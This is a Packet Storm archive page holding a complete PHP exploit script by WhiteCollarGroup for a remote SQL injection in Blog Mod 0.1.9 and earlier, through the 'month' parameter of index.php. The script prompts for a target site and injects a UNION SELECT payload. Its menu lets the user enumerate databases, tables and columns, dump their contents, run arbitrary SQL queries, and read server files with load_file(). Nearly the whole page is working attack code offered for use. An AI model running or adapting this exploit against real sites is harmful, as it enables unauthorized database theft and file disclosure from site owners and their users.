exploit the possibilities

Blog Mod 0.1.9 SQL Injection

Blog Mod 0.1.9 SQL Injection
Posted Oct 6, 2012
Authored by WhiteCollarGroup

Blog Mod versions 0.1.9 and below suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 98db8e57adf93afd0fe35441caa72b10

Blog Mod 0.1.9 SQL Injection

Change Mirror Download
<?php
/*
# Exploit Title: BlogMod <= 0.1.9 SQLi Exploit
# Date: 04th october 2012
# Exploit Author: WhiteCollarGroup
# Software Link: http://www.codigofonte.net/scripts/php/blog/367_blog-mod
# Version: 0.1.9


~> How does this exploit works?
It exploits one of the several SQL Injections in the system.
Specifiedly, in the file "index.php", parr "month".

Usage:
php filename.php
*/
function puts($str) {
echo $str."\n";
}

function gets() {
return trim(fgets(STDIN));
}

function hex($string){
$hex=''; // PHP 'Dim' =]
for ($i=0; $i < strlen($string); $i++){
$hex .= dechex(ord($string[$i]));
}
return '0x'.$hex;
}

$token = uniqid();
$token_hex = hex($token);

puts("BlogMod <= X SQL Injection Exploit");
puts("By WhiteCollarGroup");

puts("[?] Enter website URL (e. g.: http://www.target.com/blogmod/):");
$target = gets();

puts("[*] Checking...");
if(!@file_get_contents($target)) die("[!] Access error: check domain and path.");

if(substr($target, (strlen($target)-1))!="/") $target .= "/";

function runquery($query) {
global $target,$token,$token_hex;

$query = preg_replace("/;$/", null, $query);

$query = urlencode($query);
$rodar = $target . "index.php?year=2012&month=-0%20union%20all%20select%201,2,concat%28$token_hex,%28$query%29,$token_hex%29,4,5,6--%20";
$get = file_get_contents($rodar);
$matches = array();
preg_match_all("/$token(.*)$token/", $get, $matches);
if(isset($matches[1][0]))
return $matches[1][0];
else
return false;
}

if(runquery("SELECT $token_hex")!=$token) {
// error
exit;
}

function main($msg=null) {
global $token,$token_hex;

echo "\n".$msg."\n";
puts("[>] MAIN MENU");
puts("[1] Browse MySQL");
puts("[2] Run SQL Query");
puts("[3] Read file");
puts("[4] About");
puts("[0] Exit");
$resp = gets();

if($resp=="0")
exit;
elseif($resp=="1") {

// pega dbs
$i = 0;
puts("[.] Getting databases:");
while(true) {
$pega = runquery("SELECT schema_name FROM information_schema.schemata LIMIT $i,1");
if($pega)
puts(" - ".$pega);
else
break;

$i++;
}

puts("[!] Current database: ".runquery("SELECT database()"));
puts("[?] Enter database name for select:");
$own = array();
$own['db'] = gets();
$own['dbh'] = hex($own['db']);

// pega tables da db
$i = 0;
puts("[.] Getting tables from $own[db]:");
while(true) {
$pega = runquery("SELECT table_name FROM information_schema.tables WHERE table_schema=$own[dbh] LIMIT $i,1");
if($pega)
puts(" - ".$pega);
else
break;

$i++;
}
puts("[?] Enter table name for select:");
$own['tb'] = gets();
$own['tbh'] = hex($own['tb']);

// pega colunas da table
$i = 0;
puts("[.] Getting columns from $own[db].$own[tb]:");
while(true) {
$pega = runquery("SELECT column_name FROM information_schema.columns WHERE table_schema=$own[dbh] AND table_name=$own[tbh] LIMIT $i,1");
if($pega)
puts(" - ".$pega);
else
break;

$i++;
}
puts("[?] Enter columns name, separated by commas (\",\") for select:");
$own['cl'] = explode(",", gets());

// pega dados das colunas

foreach($own['cl'] as $coluna) {
$i = 0;
puts("[=] Column: $coluna");
while(true) {
$pega = runquery("SELECT $coluna FROM $own[db].$own[tb] LIMIT $i,1");
if($pega) {
puts(" - $pega");
$i++;
} else
break;
}

echo "\n[ ] -+-\n";
}

main();

} elseif($resp=="2") {
puts("[~] RUN SQL QUERY");
puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat().");
puts("[?] Query (enter for exit): ");
$query = gets();
if(!$query) main();
else main(runquery($query."\n"));
} elseif($resp=="3") {
puts("[?] File path (may not have priv):");
$file = hex(gets());
$le = runquery("SELECT load_file($file) AS wc");
if($le)
main($le);
else
main("File not found, empty or no priv!");

} elseif($resp=="4") {
puts("Coded by WhiteCollarGroup");
puts("www.wcgroup.host56.com");
puts("whitecollar_group@hotmail.com");
puts("twitter.com/WCollarGroup");
puts("facebook.com/WCollarGroup");
puts("wcollargroup.blogspot.com");
main();
}
else
main("[!] Wrong choice.");
}

main();

Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close